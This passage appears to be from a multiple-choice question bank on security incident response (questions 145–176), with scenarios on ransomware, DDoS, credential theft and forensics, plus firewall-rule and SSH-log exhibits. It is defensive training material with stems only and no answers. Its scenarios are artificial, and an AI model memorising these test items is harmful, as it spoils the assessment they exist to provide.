Refer to the exhibit. An organization uses these firewall rules. After a breach, the IR team finds that the attacker gained access via SSH from an external IP. Which rule is most likely misconfigured?

Exhibit

Firewall Rule (inbound): allow tcp any any 22 (SSH) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3389 (RDP) log
Firewall Rule (inbound): allow tcp any any 80 (HTTP) log
Firewall Rule (inbound): allow tcp any any 443 (HTTPS) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3306 (MySQL) log

Question 145 (easy, multiple choice)

A security analyst receives an alert from the SIEM indicating a high number of failed login attempts from a single external IP address targeting a public-facing web server. The analyst checks the logs and sees that the attempts are using common usernames. What is the MOST appropriate immediate response?

Question 146 (medium, multiple choice)

During the eradication phase of an incident response, which action is MOST critical to ensure the threat is fully removed?

Question 147 (hard, multiple choice)

A financial institution has an incident involving a suspected data breach of customer PII. The incident response team contains the breach. What should be the NEXT priority according to legal and regulatory requirements?

Question 148 (easy, multiple choice)

An organization experiences a DDoS attack that overwhelms their internet connection. Which containment strategy would be MOST effective?

Question 149 (medium, multiple choice)

During the identification phase of incident response, which of the following is the MOST reliable indicator of a security incident?

Question 150 (hard, multiple choice)

An organization has just recovered from a ransomware attack and restored systems from backups. Before returning to normal operations, what is the MOST important step?

Question 151 (easy, multiple choice)

Which of the following is the PRIMARY goal of incident containment?

Question 152 (medium, multiple choice)

An incident response team discovers that an attacker used stolen credentials to access a database. Which step is MOST critical during the eradication phase?

Question 153 (hard, multiple choice)

During a forensic investigation, an incident responder needs to collect memory from a compromised server. What is the BEST method to preserve evidence integrity?

Question 154 (medium, multi select)

An incident responder is handling a phishing attack that resulted in credential theft. Which TWO actions should be taken FIRST in the containment phase?

Question 155 (hard, multi select)

A security team detects lateral movement within the network using PowerShell scripts. Which TWO actions are MOST effective to contain the threat?

Question 156 (easy, multi select)

Which THREE of the following are key components of an incident response plan?

Question 157 (easy, multiple choice)

A healthcare organization suffers a ransomware attack that encrypts critical patient data. The incident response team activates the incident response plan. The backup administrator reports that the most recent backups are from three days ago and are stored on a disconnected tape drive. However, the organization's legal counsel advises that according to regulatory requirements, patient data must be recoverable within 24 hours. The CEO is considering paying the ransom to avoid extended downtime and regulatory penalties. As the incident manager, what should you recommend?

Question 158 (medium, multiple choice)

A large e-commerce company detects a sophisticated attack that has compromised a web application server. The server contains customer payment card information. The incident response team is activated. During triage, the team discovers that the attacker has gained administrative access and installed a backdoor. The company's public relations department wants to issue a press release as soon as possible to maintain customer trust. Legal counsel advises that the breach must be reported to regulators within 72 hours. The technical team is working on containment. What is the MOST important priority for the incident manager at this point?

Question 159 (hard, multiple choice)

A bank detects unusual activity on a server containing sensitive financial data. The activity appears to be from a compromised vendor account that has legitimate remote access to the server for maintenance. The incident manager must decide on containment while maintaining business operations. The vendor account has elevated privileges and is used for routine updates. Disabling the account would delay critical maintenance. What is the BEST course of action?

Question 160 (medium, multiple choice)

A company's incident response team is conducting a tabletop exercise. They are discussing the steps after containment to prevent recurrence. The facilitator asks: 'What is the MOST important next step after containing an incident?' The team considers several options.

Question 161 (easy, multi select)

Which TWO of the following are PRIMARY goals of incident management according to industry best practices?

Question 162 (medium, multi select)

Which THREE of the following are considered key components of an incident response plan?

Question 163 (hard, multi select)

Which TWO of the following are appropriate actions to take during the detection phase of incident management?

Question 164 (easy, multiple choice)

A small marketing firm with 50 employees experiences a ransomware attack. The IT administrator quickly isolates the infected workstations by disconnecting them from the network. The company has a backup strategy that performs nightly backups to an on-premises NAS device. The administrator restores the affected systems from the most recent backup, but some files remain encrypted. The users report that the backups from the last two days show corruption as well. The firm does not have a formal incident response plan. The owner is anxious to get back to work and asks the administrator what to do next. What should the administrator do?

Question 165 (medium, multiple choice)

A large enterprise with a centralized Security Information and Event Management (SIEM) system is experiencing a high volume of false positive alerts. The security team is overwhelmed and has started to ignore many alerts. During a recent incident, a critical alert indicating lateral movement by an attacker was missed because it was buried among hundreds of false positives. The incident escalated significantly before it was discovered. The CISO has asked the incident response manager to recommend improvements to prevent this from happening again. What should the manager recommend as the primary action?

Question 166 (hard, multiple choice)

A multinational financial institution uses a third-party Managed Security Service Provider (MSSP) for 24/7 monitoring of its security infrastructure. During a targeted attack, the MSSP’s analysts detected anomalous activity on a critical server at 2:00 AM. However, due to the service level agreement (SLA) which allows up to 12 hours for notification of lower-priority incidents, the MSSP classified the incident as medium severity and did not notify the internal incident response team until 2:00 PM. By then, the attacker had exfiltrated sensitive customer data. The internal team is conducting a post-incident review. What is the PRIMARY issue that led to the delay?

Question 167 (easy, multiple choice)

A manufacturing company has an incident response plan that includes a communication plan. However, during a recent ransomware incident, the team realized that the external legal counsel was not listed in the plan. The incident requires consultation with legal due to potential regulatory implications. The incident response manager needs to address this gap quickly. What should the manager do?

Question 168 (medium, multiple choice)

During a phishing campaign, several employees clicked a malicious link that downloaded a remote access trojan (RAT). The incident response team has isolated the infected endpoints and is analyzing network traffic. They suspect that data may have been exfiltrated but are unsure. The team needs to determine the extent of data exfiltration as quickly as possible. What action should the team take FIRST?

Question 169 (hard, multiple choice)

An organization's incident response policy requires preserving evidence in its original state. During a live incident on a critical server, the incident response team needs to capture volatile data, such as running processes and network connections, which would be lost if the system were shut down. The team has a forensic workstation with various tools. What tool should the team use to capture the volatile data before taking the system offline?

Question 170 (easy, multiple choice)

After successfully containing an incident, the incident response team discovers that the attacker exploited a previously unknown vulnerability in a web application. The vulnerability is not yet patched by the vendor. The organization's management is concerned about the risk of another attack using the same vulnerability. What should the team recommend as the immediate action to reduce this risk?

Question 171 (medium, multiple choice)

An organization's incident response team has completed the initial response to a ransomware incident. During the post-incident review, they identify that the detection was delayed because security logs from different systems were not correlated. The team wants to improve detection capabilities. What should the team recommend as the primary improvement?

Question 172 (hard, multiple choice)

A financial institution is hit by a Distributed Denial of Service (DDoS) attack that is overwhelming their internet-facing services. The incident response team activates the plan, but the attack continues to escalate. The CEO is under pressure and asks the incident response manager whether they should pay the ransom demand (the attackers also sent an extortion note demanding payment to stop the attack). The manager must advise the CEO on the best course of action.

Question 173 (medium, multiple choice)

A company's incident response team is handling a confirmed ransomware infection that has encrypted files on several servers. The IT director requests that the team immediately restore data from backups to minimize downtime. However, the team suspects that the backup repository may also be compromised because the attacker had administrative credentials. What is the BEST course of action?

Question 174 (easy, multi select)

Which TWO of the following are key performance indicators (KPIs) commonly used to measure the effectiveness of incident management processes?

Question 175 (hard, multiple choice)

Based on the log entries, what is the most likely scenario?

Exhibit

Refer to the exhibit.
Exhibit:
```
2024-11-20T15:23:45Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:47Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:49Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:51Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:53Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
```

Question 176 (medium, multiple choice)

Your organization is a multinational corporation with a hybrid cloud infrastructure, including on-premises data centers and AWS, Azure, and GCP environments. You have a distributed incident response team and a central SIEM that aggregates logs from all sources. You are the incident manager on duty when an alert fires indicating that a high-privilege user account (a domain admin) has been observed logging in from an IP address in a country where the company has no operations, at 3:00 AM local time. Subsequent investigation reveals that the same account also has a successful logon from the corporate headquarters at the same time, which is geographically impossible. The SIEM shows a single event for the suspicious logon, and no other indicators of compromise are present. The account has not been used for months. What is the BEST course of action?
